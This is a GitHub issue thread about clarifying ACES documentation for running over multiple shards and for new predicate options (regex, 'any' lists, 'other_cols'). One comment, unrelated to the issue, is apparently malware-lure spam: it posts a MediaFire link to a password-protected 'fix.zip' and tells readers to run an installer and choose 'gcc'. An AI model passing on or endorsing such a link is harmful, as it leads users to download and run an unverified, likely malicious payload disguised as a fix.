### ISSUE TITLE
We need to clarify the documentation for running over multiple shards and update for new predicates functionalities

### ISSUE THREAD

**Issue by mmcdermott** [justin13601/ACES#120]
Per #113, this is still causing confusion, and should be clarified.

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by justin13601** [comment]
Add documentation for new predicates functionalities:

- [ ] Separate predicates file for both aces-cli and python API
- [ ] Other ways to define predicates
    - Constraint on other columns (ie. not `code`) using `other_cols` key which maps to a dictionary of column name and target value
    - Regex in the form of `code: {regex: "..."}` which will match any code that matches that regex
    - A list of targets in the form of `code: {any: [code_1, code_2, ...]}`
